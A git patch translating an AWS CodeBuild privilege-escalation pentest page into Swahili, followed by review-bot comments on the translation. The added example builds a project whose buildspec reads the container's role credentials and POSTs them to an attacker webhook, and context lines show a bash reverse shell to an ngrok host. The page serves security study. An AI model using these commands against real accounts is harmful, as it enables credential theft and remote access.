From 243dc8ca1e3a90e236d35eebead3448ecbd559ef Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 8 Jan 2025 20:44:45 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/aws-security/aws-privilege-escalation/ --- .../aws-codebuild-privesc.md | 46 ++++++++++++++++--- 1 file changed, 40 insertions(+), 6 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md index 8f2991033..72a3c6528 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md @@ -61,7 +61,7 @@ aws codebuild start-build-batch --project --buildspec-override fi **Kumbuka**: Tofauti kati ya amri hizi mbili ni kwamba: - `StartBuild` inachochea kazi moja ya kujenga kwa kutumia `buildspec.yml` maalum. -- `StartBuildBatch` inakuwezesha kuanzisha kundi la ujenzi, kwa mipangilio tata zaidi (kama kuendesha ujenzi kadhaa kwa wakati mmoja). +- `StartBuildBatch` inakuwezesha kuanzisha kundi la ujenzi, ikiwa na mipangilio tata zaidi (kama kuendesha ujenzi kadhaa kwa wakati mmoja). **Athari Zinazoweza Kutokea:** Privesc moja kwa moja kwa majukumu ya AWS Codebuild yaliyoambatanishwa. 
@@ -133,6 +133,40 @@ aws codebuild create-project --name reverse-shell-project --source type=S3,locat # Start a build with the new project aws codebuild start-build --project-name reverse-shell-project +``` +{{#endtab }} + +{{#tab name="Example3" }} +```bash +# Generated by ex16x41, tested +# Create a hook.json file with command to send output from curl credentials URI to your webhook address + +{ +"name": "user-project-1", +"source": { +"type": "NO_SOURCE", +"buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - curl \"http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI\" | curl -X POST -d @- WEBHOOK URL\n" +}, +"artifacts": { +"type": "NO_ARTIFACTS" +}, +"environment": { +"type": "LINUX_CONTAINER", +"image": "public.ecr.aws/codebuild/amazonlinux2-x86_64-standard:4.0", +"computeType": "BUILD_GENERAL1_SMALL" +}, +"serviceRole": "ARN-OF-TARGET-ROLE" +} + +# Create a new CodeBuild project with the hook.json file +aws codebuild create-project --cli-input-json file:///tmp/hook.json + +# Start a build with the new project +aws codebuild start-build --project-name user-project-1 + +# Get Credentials output to webhook address +Wait a few seconds to maybe a couple minutes and view the POST request with data of credentials to pivot from + ``` {{#endtab }} {{#endtabs }} 
@@ -142,11 +176,11 @@ aws codebuild start-build --project-name reverse-shell-project > [!WARNING] > Katika **konteina ya Codebuild** faili `/codebuild/output/tmp/env.sh` ina kila mabadiliko ya env yanayohitajika kufikia **akiba ya metadata**. -> Faili hii ina **mabadiliko ya env `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** ambayo ina **njia ya URL** ya kufikia akiba. Itakuwa kama hii `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420` +> Faili hii ina **mabadiliko ya env `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** ambayo ina **njia ya URL** ya kufikia akiba. Itakuwa kitu kama hii `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420` > Ongeza hiyo kwenye URL **`http://169.254.170.2/`** na utaweza kudump akiba ya jukumu. -> Zaidi ya hayo, pia ina **mabadiliko ya env `ECS_CONTAINER_METADATA_URI`** ambayo ina URL kamili ya kupata **habari za metadata kuhusu konteina**. +> Zaidi ya hayo, pia ina **mabadiliko ya env `ECS_CONTAINER_METADATA_URI`** ambayo ina URL kamili ya kupata **taarifa za metadata kuhusu konteina**. ### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) @@ -268,7 +302,7 @@ aws codebuild start-build-batch --project-name codebuild-demo-project ### SSM -Kuwa na **idhini ya kutosha kuanzisha kikao cha ssm** inawezekana kupata **ndani ya mradi wa Codebuild** unaojengwa. +Kuwa na **idhini za kutosha kuanzisha kikao cha ssm** inawezekana kupata **ndani ya mradi wa Codebuild** unaojengwa. Mradi wa codebuild utahitaji kuwa na breakpoint: 
@@ -317,13 +351,13 @@ build: commands: - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1 ``` -**Impact:** Privesc ya moja kwa moja kwa jukumu linalotumiwa na mfanyakazi wa AWS CodeBuild ambalo mara nyingi lina mamlaka ya juu. +**Impact:** Moja kwa moja privesc kwa jukumu lililotumiwa na mfanyakazi wa AWS CodeBuild ambalo mara nyingi lina mamlaka ya juu. > [!WARNING] > Kumbuka kwamba buildspec inaweza kutarajiwa kuwa katika muundo wa zip, hivyo mshambuliaji atahitaji kupakua, kufungua, kubadilisha `buildspec.yml` kutoka kwenye saraka ya mzizi, kuzipa tena na kupakia. Maelezo zaidi yanaweza kupatikana [here](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/). -**Potential Impact:** Privesc ya moja kwa moja kwa majukumu ya AWS Codebuild yaliyoambatanishwa. +**Potential Impact:** Moja kwa moja privesc kwa majukumu ya AWS Codebuild yaliyoambatanishwa. {{#include ../../../banners/hacktricks-training.md}}
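Review bot: in the new Example3 tab (hunk `@@ -133,6 +133,40 @@`), the fence is tagged `bash` but contains a JSON document and a closing prose line ("Wait a few seconds to maybe a couple minutes ...") that is not a comment, so the block is neither valid shell nor valid JSON. Move the `hook.json` body into its own `json` fence and make the closing sentence a `#` comment or plain text outside the fence. The comment says to create `hook.json` while the command reads `file:///tmp/hook.json`; use the same path in both places. The comments in this tab are also left in English although the commit is a translation of this page, and the blank line added before the closing fence can be dropped.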
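Review bot: the lines changed in the `[!WARNING]` block (hunk `@@ -142,11 +176,11 @@`) still carry two mistranslated technical terms: "mabadiliko ya env" means "env changes", not "env variables", and "akiba" means "savings/reserve", not "credentials". Since the hunk already rewrites these lines ("kitu kama hii", "taarifa"), fix the terms in the same pass, either with accurate Swahili or by keeping the English words "env variable" and "credentials" the way `privesc` and `metadata` are kept elsewhere on the page.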
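Review bot: in the last hunk (`@@ -317,13 +351,13 @@`) the new **Impact** line reads worse than the one it replaces: "Moja kwa moja privesc" puts the modifier before the noun in English word order, and "lililotumiwa" changes the tense from "linalotumiwa" (the role that is used) to past (the role that was used), which shifts the meaning. Keep the removed wording "Privesc ya moja kwa moja kwa jukumu linalotumiwa ..." for both lines. The labels `**Impact:**` and `**Potential Impact:**` are also left in English here, while the first hunk's context shows the same label translated as `**Athari Zinazoweza Kutokea:**`; use one form across the file.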